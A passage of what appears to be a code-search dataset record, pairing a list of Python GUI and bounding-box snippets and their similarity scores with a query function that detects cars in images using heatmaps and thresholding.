self.min_button_size[0],\r\n self.min_button_size[1])\r\n entry.rect.centerx = buttons_rect.centerx\r\n \r\n self.bottom_button_align.align(bottom_buttons_rect,\r\n self.bottom_entries,\r\n self.button_hspacing,\r\n self.min_bottom_button_size)\r\n \r\n self.background.image = \\\r\n self.render_background(bg_rect.w, bg_rect.h)\r\n self.background.rect = bg_rect\r\n \r\n self.buttons_rect = buttons_rect\r\n \r\n self.changed = False\r\n \r\n super().update(*args, **kwargs)", "def frame(self):", "def update(self):\n self.board.update()", "def draw_boxes(self, im, boxes):\n for bbox in boxes:\n l = [int(x) for x in bbox[\"coords\"]]\n l = self.scalebox(l)\n icon = self.classes_to_icons[bbox[\"label\"]]\n overlay_im_to_background(im, icon, l[0], l[1] - icon.shape[0] - 5)\n cv2.rectangle(im,(l[0],l[1]),(l[2],l[3]),self.color,2)", "def _update_boxes(self, x,y):\n\t\talloc = self.alloc2img()\n\t\t\n\t\tif not rect_contains(alloc, x,y):\n\t\t\t# The mouse has left the widget\n\t\t\tself._changed_rect = None\n\t\t\tself._boxes_under_cursor = []\n\t\t\treturn True\n\t\t\n\t\tif self._changed_rect is None or not rect_contains(self._changed_rect, x, y):\n\t\t\tif len(self.model) == 0: return False\n\t\t\t# The mouse left the common area\n#\t\t\tif __debug__: print '(%i,%i)' % (x,y),\n\t\t\t\n#\t\t\tif __debug__: print \"Old rect:\", tuple(self._changed_rect) if self._changed_rect is not None else self._changed_rect,\n\t\t\tself._changed_rect = 
None\n\t\t\t\t\n\t\t\t\n\t\t\t# Calculate new boxes\n\t\t\tnewboxes = self.find_boxes_under_coord(x,y)\n\t\t\tself._boxes_under_cursor = newboxes\n#\t\t\tif __debug__: print \"newboxes:\", newboxes,\n\t\t\t\n\t\t\t# Update the caching rectangle\n\t\t\tif len(newboxes):\n\t\t\t\tchanged = newboxes[0].rect\n\t\t\telse: # Outside of any boxes, use allocation\n\t\t\t\tchanged = alloc\n\t\t\tfor b in newboxes[1:]:\n\t\t\t\tchanged = changed.intersect(b.rect)\n\t\t\tfor r in self.model:\n\t\t\t\tb = r[self.box_col]\n\t\t\t\tif b not in newboxes:\n\t\t\t\t\tchanged = rect_diff(changed, b.rect, (x,y))\n\t\t\tif changed == alloc: # This is so extrodinarily BAD that we should test for it.\n\t\t\t\t# It's bad because if it were true, the cache would never clear\n\t\t\t\tfrom warnings import warn\n\t\t\t\twarn(\"The chosen change rect was the allocation. THIS SHOULD'T HAPPEN.\")\n\t\t\t\tchanged = None\n\t\t\tif __debug__: print \"Change rect:\", changed\n\t\t\tself._changed_rect = changed\n\t\t\tassert changed is None or rect_contains(changed, x,y)\n\t\t\tif __debug__: self.queue_draw()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def __call__(self):\n self.brain._update_fscale(self.factor)\n for key in self.brain.keys:\n if self.widgets[key] is not None:\n self.widgets[key].set_value(self.brain._data[key])", "def _update_frame(self):\n # check if continue\n if self._keep_updating:\n self.__frame = self._cam.get_display_frame()\n if self.__frame is not None:\n self._cvn_camera_viewfinder.create_image(0, 0, image=self.__frame, anchor=tk.NW)\n\n self._root.after(self._delay, self._update_frame)", "def __init__(self, master, num_pokemon):\n super().__init__(master)\n self._num_pokemon = num_pokemon\n self._master = master\n self.pokeballs = 0\n\n #insert image of pokeball\n frame1 = tk.Frame(self._master)\n frame1.pack(side=tk.LEFT)\n\n self.ballimage = tk.PhotoImage(file=\"./images/full_pokeball.gif\")\n self.ball = tk.Label(frame1, image=self.ballimage)\n self.ball.pack(side=tk.LEFT)\n\n self.balls = frame1\n self.ballup = tk.Label(self.balls, text=f'{self.pokeballs} attemped catches')\n self.ballup.pack(side=tk.TOP)\n self.balldown = tk.Label(self.balls, text=f'{self._num_pokemon - self.pokeballs} pokeballs left')\n self.balldown.pack(side=tk.BOTTOM)\n self.balls.pack(side=tk.LEFT)\n\n #insert image of clock\n frame2 = tk.Frame(self._master)\n frame2.pack(side=tk.LEFT)\n\n self.clockimage = tk.PhotoImage(file=\"./images/clock.gif\")\n self.clock = tk.Label(frame2, image=self.clockimage)\n self.clock.pack(side=tk.LEFT)\n\n #insert the button of \"New game\" and \" Restart game\"\n self.buttons = tk.Frame(self)\n self.n = tk.Button(self.buttons, text=\"New game\")\n self.r = tk.Button(self.buttons, text=\"Restart game\")\n self.n.pack(side=tk.TOP)\n self.r.pack(side=tk.BOTTOM)\n self.buttons.pack(side=tk.RIGHT)", "def _updateBoundingRect(self):\n self.setPen(QPen(Qt.NoPen))\n self.setRect(self.childrenBoundingRect())\n # move and show or hide the buttons if necessary\n addButton = self._addBasesButton\n rmButton = self._removeBasesButton\n if len(self._virtualHelixItemList) > 0:\n addRect = addButton.boundingRect()\n rmRect = rmButton.boundingRect()\n x = self._vHRect.right()\n y = -styles.PATH_HELIX_PADDING\n addButton.setPos(x, y)\n rmButton.setPos(x-rmRect.width(), y)\n addButton.show()\n rmButton.show()\n else:\n addButton.hide()\n rmButton.hide()", "def __init__(self):\n self.window = Tk()\n self.window.title(\"Brick Breaker\")\n self.window.attributes(\"-fullscreen\", True)\n 
self.window.iconbitmap(\"data/wall.ico\")\n self.window.config(background=\"light blue\")\n\n # initialization des composants\n self.frame = Frame(self.window, bg='light blue')\n self.littleFrame = Frame(self.frame, bg='light blue')\n self.littleFrame_bis = LabelFrame(self.frame, bg='light blue', text=\"USER NAME\")\n\n # creation des composants\n self.create_title()\n self.create_subtitle()\n self.create_play_button()\n self.create_quit_button()\n\n # empaquetage\n self.littleFrame_bis.pack(expand=YES, pady=30)\n self.littleFrame.pack(expand=YES, pady=50)\n self.frame.pack(expand=YES, fill=BOTH, pady=200)", "def slider_frames_changed(self):\n\n # Again, please note the difference between indexing and GUI displays.\n index = self.slider_frames.value() - 1\n\n # Differentiate between frame ordering (by quality or chronologically).\n if self.frame_ordering == \"quality\":\n self.frame_index = self.quality_sorted_indices[index]\n self.quality_index = index\n\n else:\n self.frame_index = index\n self.quality_index = self.rank_indices[self.frame_index]\n\n # Adjust the frame list and select the current frame.\n\n self.listWidget.setCurrentRow(index, QtCore.QItemSelectionModel.SelectCurrent)\n\n # Update the image in the viewer.\n self.frame_selector.setPhoto(self.frame_index)\n self.listWidget.setFocus()", "def redraw(self):\n bpy.context.scene.objects.active = bpy.context.scene.objects.active", "def update_gui(self):\n for where, updates in self.gui_updates.items():\n self.window[where].update(**updates)\n self.gui_updates = {}", "def buttonbox(self):\n\n box = Frame(self)\n b = Button(box, text=\"OK\", width=10, command=self.ok, default=ACTIVE)\n b.pack(side=LEFT, padx=5, pady=5)\n #w = Button(box, text=\"Cancel\", width=10, command=self.cancel)\n a= Button(box, text=\"Autofill\", width=10, command=self.auto_populate, default=ACTIVE)\n a.pack(side=LEFT, padx=5, pady=5)\n #w.pack(side=LEFT, padx=5, pady=5)\n #w[\"state\"] = DISABLED\n\n\n self.bind(\"<Return>\", self.ok)\n self.bind(\"<Escape>\", self.cancel)\n\n box.pack()", "def update(self, box):\n if box is not None:\n self.last_boxes.append(box)\n bound = min(len(self.last_boxes), self.n_frames)\n self.best_box = np.mean(self.last_boxes[-bound:], axis=0).astype(np.uint32)\n\n self.frames_undetected = 0\n else:\n self.frames_undetected += 1\n\n self.age += 1", "def update_bbox(self, viewer, dims):\n title = self.get_title()\n self._title.text = title if title is not None else '555.55'\n self.title_wd, self.txt_ht = viewer.renderer.get_dimensions(self._title)\n\n wd, ht = dims[:2]\n y_hi = ht\n if title is not None:\n # remove Y space for X axis title\n y_hi -= self.txt_ht + 4\n # remove Y space for X axis labels\n y_hi -= self.txt_ht + self.pad_px\n\n self.aide.update_plot_bbox(y_hi=y_hi)", "def edit(self):\n self.toplevel = tk.Toplevel()\n # ============================= Frame Setup\n # Get Frames for each side of the editor\n self.leftSide = tk.LabelFrame(self.toplevel, text=\"Leftside\")\n self.rightSide = tk.LabelFrame(self.toplevel, text=\"Rightside\")\n self.leftSide.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n self.rightSide.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n #### Build the leftside\n # Frame for controlling the title of node\n self.titleFrame = tk.LabelFrame(self.leftSide, text=\"Title\")\n self.titleFrame.pack(side=tk.TOP, fill=tk.X, expand=False)\n self.titleEntry = tk.Entry(self.titleFrame)\n self.titleEntry.pack(side=tk.LEFT, fill=tk.X, expand=True)\n self.titleUpdateButton = tk.Button(self.titleFrame, 
text=\"Update\", command=self.update_title_from_entry)\n self.titleUpdateButton.pack(side=tk.LEFT)\n # ============================= EditorFrame\n self.editorFrame = tk.Frame(self.leftSide)\n self.editorFrame.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n self.textWidget = tk.Text(self.editorFrame)\n self.textWidget.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n # ============================= Status Bar\n self.statusFrame = tk.LabelFrame(self.leftSide, text=\"Status\", relief=tk.SUNKEN)\n self.statusFrame.pack(side=tk.TOP, fill=tk.X, expand=False)\n self.wordWrapStatus = tk.Menubutton(self.statusFrame)\n self.wordWrapStatus.pack()\n # ============================== Buttons on the right side of the editor\n self.buttonFrame = tk.Frame(self.rightSide)\n self.buttonFrame.pack(side=tk.TOP)\n self.saveButton = tk.Button(self.buttonFrame, text=\"save\", command=self.on_editor_save, bg=\"green\")\n self.exitButton = tk.Button(self.buttonFrame, text=\"exit\", command=self.on_editor_exit, bg=\"red\")\n self.saveButton.pack(side=tk.LEFT, fill=tk.X, expand=True)\n self.exitButton.pack(side=tk.LEFT, fill=tk.X, expand=True)\n # insert title of node into title entry\n self.titleEntry.insert(tk.END, self.title)\n # insert contents of node into textwidget\n self.textWidget.insert(tk.END, self.text)", "def _change_coordinate_frame(self, boxes, window):\n with tf.name_scope('change_coordinate_frame'):\n\n ymin, xmin, ymax, xmax = tf.unstack(boxes, axis=1)\n ymin -= window[0]\n xmin -= window[1]\n ymax -= window[0]\n xmax -= window[1]\n\n win_height = window[2] - window[0]\n win_width = window[3] - window[1]\n boxes = tf.stack([\n ymin/win_height, xmin/win_width,\n ymax/win_height, xmax/win_width\n ], axis=1)\n boxes = tf.cond(tf.greater(tf.shape(boxes)[0], 0),\n lambda: tf.clip_by_value(boxes, clip_value_min=0.0, clip_value_max=1.0),\n lambda: boxes\n )\n # boxes = tf.clip_by_value(boxes, clip_value_min=0.0, clip_value_max=1.0) - work_element_count > 0 (0 vs. 
0)\n return boxes", "def model_refresh(self):\n for x in range(self._dim):\n for y in range(self._dim):\n if self._board[x][y]:\n self.canvas.itemconfig(self.rect[y,x], fill=self._secondary_color)\n else:\n self.canvas.itemconfig(self.rect[y,x], fill=self._primary_color)", "def main():\n global fenetre, gr_grid,grid,steps,btn\n fenetre = Frame()\n fenetre.grid()\n fenetre.master.title('Rush Hour')\n flabel = Frame(fenetre)\n flabel.grid()\n steps=StringVar()\n Label(flabel, textvariable=steps).pack()\n steps.set(str(len(l))+\" steps remaining\")\n background = Frame(fenetre, bg = game_bg, width=game_size, height=game_size)\n background.grid()\n gr_grid = []\n for i in range(6):\n gr_line = []\n for j in range(6):\n cell = Frame(background, bg = tiles_empty_bg, width = tiles_size, height = tiles_size)\n cell.grid(row=i, column=j,padx=1, pady=1)\n t = Label(master = cell, text = \"\", bg = tiles_empty_bg, justify = CENTER, font = tiles_font, width=4, height=2)\n t.grid()\n gr_line.append(t)\n gr_grid.append(gr_line)\n\n board_display(my_board)\n button=Frame(fenetre)\n button.grid()\n btn=StringVar()\n Button(button, textvariable=btn, command=next_step).pack(side=BOTTOM)\n btn.set(\"Next step\")\n fenetre.mainloop()", "def __init__(self):\n EasyFrame.__init__(self, title = \"Game Time\")\n self.setSize(440, 400)\n self.cardLabel1 = self.addLabel(\"\", row = 0,\n column = 0,\n sticky = \"NSEW\")\n self.cardLabel2 = self.addLabel(\"\", row = 0,\n column = 1,\n sticky = \"NSEW\")\n self.cardLabel3 = self.addLabel(\"\", row = 0,\n column = 2,\n sticky = \"NSEW\")\n self.stateLabel = self.addLabel(\"\", row = 1, column = 0,\n sticky = \"NSEW\",\n columnspan = 2)\n self.addButton(row = 2, column = 0,\n text = \"New game\",\n command = self.newDeal)\n self.addButton(row = 2, column = 2,\n text = \"Quit\",\n command = self.quit)", "def __init__(self, master, width, height, number):\n Frame.__init__(self, master)\n # create list of minesweeper cell coords\n cellCoords = []\n for h in range(height):\n for w in range(width):\n cellCoords.append((h, w))\n random.shuffle(cellCoords)\n # find bombs\n self.bombCoords = cellCoords[:number]\n self.bombs = []\n for bomb in self.bombCoords:\n self.bombs.append(MsCell(bomb, True, self))\n # make the rest non-bomb cells\n self.cellCoords = cellCoords[number:]\n self.nonExposed = self.cellCoords[:]\n self.nonBombcells = []\n for cell in self.cellCoords:\n adjacentBombs = 0\n for h in range(max(0, cell[0] - 1), min(cell[0] + 2, height)):\n for w in range(max(0, cell[1] - 1), min(cell[1] + 2, width)):\n if (h, w) in self.bombCoords:\n adjacentBombs += 1\n self.nonBombcells.append(MsCell(cell, adjacentBombs, self))\n # set cell\n self.number = number\n self.height = height\n self.width = width\n # set number label\n self.numberLabel = Label(master, text=str(self.number))\n self.numberLabel.grid(row=self.height, columnspan=self.width)" ]
[ "0.6689228", "0.66155696", "0.65819746", "0.6271218", "0.6260631", "0.6133513", "0.6128093", "0.611145", "0.60912585", "0.6082675", "0.6053892", "0.6053803", "0.6029776", "0.6003047", "0.596538", "0.5959297", "0.5884809", "0.58832145", "0.5862301", "0.5841208", "0.58308303", "0.57989013", "0.57987803", "0.5797244", "0.5791403", "0.5784546", "0.5780775", "0.5772115", "0.5767569", "0.5767495", "0.57668906", "0.57662743", "0.57606494", "0.57595444", "0.57565504", "0.5753179", "0.57503575", "0.57469773", "0.57406175", "0.57345307", "0.57290334", "0.5719542", "0.57144344", "0.5697462", "0.56873125", "0.56761235", "0.5671979", "0.5670261", "0.56625366", "0.5658493", "0.5655677", "0.56529945", "0.5651338", "0.56510246", "0.56491196", "0.56479603", "0.56417894", "0.5639551", "0.5628968", "0.56281054", "0.5625314", "0.5613899", "0.56133354", "0.56125075", "0.5611274", "0.5609017", "0.5595006", "0.5589591", "0.5566292", "0.55658174", "0.5563702", "0.5563702", "0.5563702", "0.55627745", "0.5561714", "0.5547096", "0.5546323", "0.55448854", "0.5543346", "0.55381083", "0.5533458", "0.5532142", "0.55311716", "0.5529818", "0.55272126", "0.55232203", "0.55182475", "0.5516737", "0.5512368", "0.5506762", "0.5506394", "0.55038446", "0.5490902", "0.5482481", "0.5479571", "0.5476376", "0.5461994", "0.5455747", "0.5454042", "0.54509264" ]
0.62919223
3
detect cars on image using historical information and heatmap
def detect(self, img, thresh_hold, show=False): heat = np.zeros_like(img[:,:,0]).astype(np.float) # heatmap for all boxes found in last n_frames frame heat = add_heat(heat,self.boxes) # threshold for multiple frames thresh = thresh_hold*len(self.lengths) # initialization if len(self.lengths) == 0: thresh = thresh_hold heat = apply_threshold(heat,thresh) # Visualize the heatmap when displaying heatmap = np.clip(heat, 0, 255) # Find final boxes from heatmap using label function labels = label(heatmap) draw_img = draw_labeled_bboxes(np.copy(img), labels) if show: plot_dual(draw_img, heatmap,'Car positions','Heat Map',cm2='hot') return draw_img
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def find_cars(img, scale):\n img_boxes = [] # Clears img_boxes so we don't keep unwanted heatmap history\n count = 0\n draw_img = np.copy(img)\n\n # Make a heatmap of zeros\n heatmap = np.zeros_like(img[:, :, 0])\n\n # IMPORTANT : reading *.jpeg's (scaled 0-255, aka scaling needed), but\n # # trained on *.png's (scaled 0-1, aka scaling not needed)\n if img.dtype == 'uint8':\n img = img.astype(np.float32) / 255 # aka scaling needed\n\n img_tosearch = img[ystart:ystop, :, :]\n ctrans_tosearch = convert_color(img_tosearch, conv='RGB2YCrCb')\n\n if scale != 1: # resize whole image instead of separate windows\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1] / scale), np.int(imshape[0] / scale)))\n\n ch1 = ctrans_tosearch[:, :, 0]\n ch2 = ctrans_tosearch[:, :, 1]\n ch3 = ctrans_tosearch[:, :, 2]\n\n # Define blocks and steps as above\n # These hold the number of HOG cells\n nxblocks = (ch1.shape[1] // pix_per_cell) - 1 # Note : '//' causes integers to be result, instead of floats\n nyblocks = (ch1.shape[0] // pix_per_cell) - 1\n # How many features per block are we going to be extracting\n nfeat_per_block = orient * cell_per_block ** 2\n window = 64\n nblocks_per_window = (window // pix_per_cell) - 1\n # aka 75% overlap between cells\n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n\n # Compute individual channel HOG features for the entire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n\n for xb in range(nxsteps):\n for yb in range(nysteps):\n count += 1\n ypos = yb * cells_per_step\n xpos = xb * cells_per_step\n # Extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_feat2 = hog2[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_feat3 = hog3[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos * pix_per_cell\n ytop = ypos * pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop + window, xleft:xleft + window], (64, 64))\n\n # Get colour features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(\n np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1))\n test_prediction = svc.predict((test_features))\n\n if test_prediction == 1:\n xbox_left = np.int(xleft * scale)\n ytop_draw = np.int(ytop * scale)\n win_draw = np.int(window * scale)\n cv2.rectangle(draw_img, (xbox_left, ytop_draw + ystart),\n (xbox_left + win_draw, ytop_draw + win_draw + ystart), (0, 0, 255))\n img_boxes.append(\n ((xbox_left, ytop_draw + ystart), (xbox_left + win_draw, ytop_draw + win_draw + ystart)))\n heatmap[ytop_draw + ystart:ytop_draw + win_draw + ystart, xbox_left:xbox_left + win_draw] += 1\n\n return draw_img, img_boxes, heatmap", "def process_image( self, image ):\n \n # 1. 
detect cars in image at different scales\n \n # Modify x/y start stop according to scale, cars appear smaller near horizon\n scales = config.scales\n \n box_list = []\n for scale_item in scales:\n scale = scale_item[\"scale\"]\n detects_image, boxes = hog_subsample.find_cars(image, \n scale_item[\"y_start_stop\"][0], scale_item[\"y_start_stop\"][1], \n scale, \n config.settings[\"svc\"], \n config.settings[\"scaler\"], \n config.settings[\"orient\"], \n config.settings[\"pix_per_cell\"], config.settings[\"cell_per_block\"], \n config.settings[\"spatial_size\"], config.settings[\"hist_bins\"],\n scale_item[\"x_start_stop\"][0], scale_item[\"x_start_stop\"][1])\n box_list.extend(boxes)\n \n # Update history\n self.bbox_list_history.append( box_list )\n bbox_list_history_list = sum(self.bbox_list_history.copy(), []) # single list of bbox lists in history\n \n # 2. heat map and threshold\n \n # Make zeros shaped like image\n heat = np.zeros_like(image[:,:,0]).astype(np.float)\n\n # Add heat for each box in box list history\n heat = heatmap_threshold_detection.add_heat(heat, bbox_list_history_list)\n\n # Apply threshold to help remove false positives\n heat_threshold = config.heatmap_threshold\n heat = heatmap_threshold_detection.apply_threshold(heat, heat_threshold)\n\n # Find final boxes from heatmap using label function\n heatmap = np.clip(heat, 0, 255) # only need to clip if there is more than 255 boxes around a point?\n labels = label(heatmap)\n boxed_image = heatmap_threshold_detection.draw_labeled_bboxes(np.copy(image), labels)\n \n # frame image annotation\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(boxed_image,\"Frame:{}\".format(config.count), (10,100), font, 1, (255,255,255), 2 ,cv2.LINE_AA )\n \n return boxed_image", "def find_cars(img,\n clf,\n scaler,\n color_space,\n spatial_size,\n hist_bins,\n scale,\n cells_per_step,\n x_start_stop,\n y_start_stop,\n orient,\n pix_per_cell,\n cell_per_block):\n draw_img = np.copy(img)\n\n heatmap = np.zeros_like(img[:, :, 0])\n\n img = img.astype(np.float32)/255\n\n img_to_search = img[y_start_stop[0]:y_start_stop[1], x_start_stop[0]:x_start_stop[1], :]\n\n # color transformed image\n ctrans_to_search = change_color_space(img_to_search, colorspace=color_space)\n\n if scale != 1:\n imshape = ctrans_to_search.shape\n ctrans_to_search = cv2.resize(ctrans_to_search, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n\n ch1 = ctrans_to_search[:, :, 0]\n ch2 = ctrans_to_search[:, :, 1]\n ch3 = ctrans_to_search[:, :, 2]\n\n nxblocks = (ch1.shape[1] // pix_per_cell) - 1 # number of hog cells\n nyblocks = (ch1.shape[0] // pix_per_cell) - 1\n nfeat_per_block = orient*cell_per_block**2\n window = 64\n nblocks_per_window = (window // pix_per_cell) - 1\n\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n\n # compute individual channel HOG features for the intire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n\n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n # extract hog features for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_feat3 = 
hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos*pix_per_cell\n ytop = ypos*pix_per_cell\n\n # extract the image path\n subimg = cv2.resize(ctrans_to_search[ytop:ytop+window, xleft:xleft+window], (64,64))\n\n # get color features\n spatial_features = get_bin_spatial(subimg, size=spatial_size)\n hist_features = get_color_hist(subimg, nbins=hist_bins)\n\n # scale features and make prediction\n test_features = scaler.transform(np.hstack((spatial_features, hist_features, hog_features)))\n\n test_prediction = clf.predict(test_features)\n\n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale)\n win_draw = np.int(window*scale)\n cv2.rectangle(draw_img, (xbox_left+x_start_stop[0], ytop_draw+y_start_stop[0]), (xbox_left+win_draw+x_start_stop[0], ytop_draw+win_draw+y_start_stop[0]), (0,0,255), 6)\n heatmap[ytop_draw+y_start_stop[0]:ytop_draw+win_draw+y_start_stop[0], xbox_left+x_start_stop[0]:xbox_left+win_draw+x_start_stop[0]] += 1\n\n return draw_img, heatmap", "def find_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size,\n hist_bins):\n draw_img = np.copy(img)\n img_tosearch = img[ystart:ystop, :, :]\n ctrans_tosearch = convert_color(img_tosearch, conv='RGB2YCrCb')\n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1] / scale), np.int(imshape[0] / scale)))\n\n # Channel extraction\n ch1 = ctrans_tosearch[:, :, 0]\n ch2 = ctrans_tosearch[:, :, 1]\n ch3 = ctrans_tosearch[:, :, 2]\n\n # Define blocks and steps as above\n nxblocks = (ch1.shape[1] // pix_per_cell) - cell_per_block + 1\n nyblocks = (ch1.shape[0] // pix_per_cell) - cell_per_block + 1\n\n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\n window = 64\n nblocks_per_window = (window // pix_per_cell) - cell_per_block + 1\n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n\n # Compute individual channel HOG features for the entire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n detections = []\n\n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb * cells_per_step\n xpos = xb * cells_per_step\n # Extract HOG for this patch\n\n # Flatten the HOG features for each channel position\n hog_feat1 = hog1[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_feat2 = hog2[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_feat3 = hog3[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n # Build hog_features array by stacking each channel\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos * pix_per_cell\n ytop = ypos * pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop + window, xleft:xleft + window], (64, 64))\n\n # Get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(\n np.hstack((spatial_features, 
hist_features, hog_features)).reshape(1, -1))\n test_prediction = svc.predict(test_features)\n confidence = svc.decision_function(test_features)\n\n if test_prediction == 1 and confidence > 0.6:\n xbox_left = np.int(xleft * scale)\n ytop_draw = np.int(ytop * scale)\n win_draw = np.int(window * scale)\n x1 = xbox_left\n y1 = ytop_draw + ystart\n x2 = xbox_left + win_draw\n y2 = ytop_draw + win_draw + ystart\n detections.append((x1, y1, x2, y2))\n return detections", "def detect_vehicles_image(input_img,\n scaler=None,\n classifier=None,\n decision=DECISION_THRESHOLD,\n tracker=None,\n method='heatmap',\n save_path=None,\n prefix=None,\n view=True,\n show=True):\n img = np.copy(input_img)\n # diffent sliding window sizes\n xy_windows = [ (100, 100), (120, 120), (140, 140), (180, 180)]\n xy_overlaps = [(0.50, 0.50), (0.50, 0.50), (0.50, 0.50)]\n all_car_window_list = [] # car window list for all window scales\n\n for i, (xy_window, xy_overlap) in enumerate(zip(xy_windows, xy_overlaps)):\n img_height = img.shape[0]\n img_width = img.shape[1]\n view_height = int(img_height/2)\n y_start_stop=[view_height, img_height]\n xy_nums = (int(view_height/xy_window[1])*2,\n int(img_width/xy_window[0])*2)\n\n window_list = slide_window(img, xy_window=xy_window,\n xy_overlap=xy_overlap, y_start_stop=y_start_stop)\n wprefix = str(prefix) + 'w' + str(i) + 'i'\n #if view:\n #show_grid_view(img, window_list, xy_nums=xy_nums)\n car_window_list = predit_vehicles(\n img, window_list,\n scaler=scaler, classifier=classifier,\n decision=decision,\n save_path=save_path,\n prefix=wprefix)\n all_car_window_list.extend(car_window_list)\n if view:\n show_window_img = draw_boxes(img, all_car_window_list, color=(0, 255, 255), thick=3)\n plt.imshow(show_window_img)\n if show:\n plt.show()\n window_img = None\n if method == 'nms':\n ### track the cars using nms\n track_car_windows = tracker.track_nms(all_car_window_list)\n window_img = draw_boxes(img, track_car_windows, color=(0, 255, 0), thick=3)\n else:\n ### track the cars using heat map and labels\n track_labels = tracker.track_labels(all_car_window_list, view=view)\n #print(track_labels[1], 'cars found')\n window_img= Tracker.draw_labeled_bboxes(img, track_labels)\n\n\n if view:\n plt.imshow(window_img)\n if show:\n plt.show()\n\n return window_img", "def process_frame(self, img):\n found = []\n for scale in self.settings['scales']:\n found.extend(find_cars(img, scale[0], scale[1], scale[2], scale[3], scale[4], self.clf, self.scaler,\n self.settings['color_space'], self.settings['orient'], self.settings['pix_per_cell'],\n self.settings['cell_per_block'], self.settings['spatial_size'],\n self.settings['hist_bins'], self.log, self.settings['min_conf']))\n\n self.prev_frames.append(found)\n if len(self.prev_frames) > self.settings['n_frames']:\n self.prev_frames.pop(0)\n heatmap = np.ones_like(img[:, :, 0]).astype(np.float)\n for frame in self.prev_frames:\n f_heatmap = np.ones_like(img[:, :, 0]).astype(np.float)\n add_heat(f_heatmap, frame)\n heatmap = heatmap * f_heatmap\n\n acc_heatmap = np.copy(heatmap)\n\n bboxes = find_bboxes_from_heatmap(apply_threshold(heatmap,\n self.settings['heat_threshold'] ** self.settings['n_frames']))\n\n if self.settings['DEBUG']:\n single_heatmap = add_heat(np.zeros_like(img[:, :, 0]).astype(np.float), found)\n single_heatmap = np.clip(single_heatmap, 0, 255)\n single_heatmap = np.dstack((single_heatmap, single_heatmap, single_heatmap))\n acc_heatmap = np.sqrt(acc_heatmap)\n acc_heatmap = np.clip(acc_heatmap, 0, 255)\n acc_heatmap = 
